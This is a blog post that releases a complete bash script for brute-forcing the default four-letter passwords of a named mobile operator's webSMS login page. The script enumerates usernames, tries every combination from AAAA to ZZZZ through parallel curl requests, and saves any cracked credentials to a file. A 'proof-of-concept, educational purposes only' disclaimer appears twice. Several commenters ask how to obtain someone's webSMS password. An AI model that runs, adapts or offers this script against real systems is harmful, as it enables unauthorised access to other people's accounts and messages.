some time ago I posted an article about how ridiculously insecure the webSMS site was, and how it was relatively simple it was for somebody to write up a bash script to possibly crack the default passwords.
For lack of something better to post about, I'm releasing the 5-minute bash script that I wrote as a proof-of-concept (for myself mostly). The following code is released on a ZERO LIABILITY basis. Which means, I am in no way responsible for your actions. It's proof-of-concept code and is NOT intended to be used. Educational purposes only. I will not be held responsible for any claims or charges of damages, negligence, cyber-crime etc and YOU automatically agree to this if you continue reading beyond this point. As such, I will not be giving you instructions or assistance regarding it. Thank you for your co-operation :)
EDIT: It seems some people didn't get the message when I said I won't provide any support for this. Let me clarify, DO NOT ASK ME HOW TO USE IT!
For lack of something better to post about, I'm releasing the 5-minute bash script that I wrote as a proof-of-concept (for myself mostly). The following code is released on a ZERO LIABILITY basis. Which means, I am in no way responsible for your actions. It's proof-of-concept code and is NOT intended to be used. Educational purposes only. I will not be held responsible for any claims or charges of damages, negligence, cyber-crime etc and YOU automatically agree to this if you continue reading beyond this point. As such, I will not be giving you instructions or assistance regarding it. Thank you for your co-operation :)
EDIT: It seems some people didn't get the message when I said I won't provide any support for this. Let me clarify, DO NOT ASK ME HOW TO USE IT!
#!/bin/bash
cd $HOME/Desktop
mxjobs=15
cont=0
if [ -z ${2} ]
then
cont=1
else
cont=0
fi
echo "checking if username exists"
if [ -n "`curl -s --compressed -d \"username=${1}&password=wroXngo123!@)\" \
http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | \
grep \"password is incorrect\"`" ]
then
echo "User exists. Let's see what happens."
else
echo "That username does not exist."
exit
fi
for a in {A..Z};do for b in {A..Z};do for c in {A..Z};do for d in {A..Z}
do
f="${a}${b}${c}${d}"
if [ $cont -lt 1 ]
then
echo -en "skipping ${a}${b}${c}${d}\r"
if [ "${f}" = "${2}" ]
then
echo
echo "MATCH"
cont=1
fi
continue
fi
ok=0
while [ $ok -lt 1 ]
do
if [ `ps -A | grep curl | wc -l` -lt $mxjobs ]
then
ok=1
fi
done
echo -en "Testing ${f}\r"
if [ -n "`curl -s --compressed -d \"username=${1}&password=${f}\" \
http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | grep Dear`" ];then \
echo "Found ${1},${f}" | tee -a foundpasses.txt;killall curl;kill ${$};fi&
done;done;done;done
echo "I guess we didn't find it then"
4 Comments:
WOT?
which languaje is this 1, java script?
how to get the web sms password........
i have gorfot the user name!.....
Post a Comment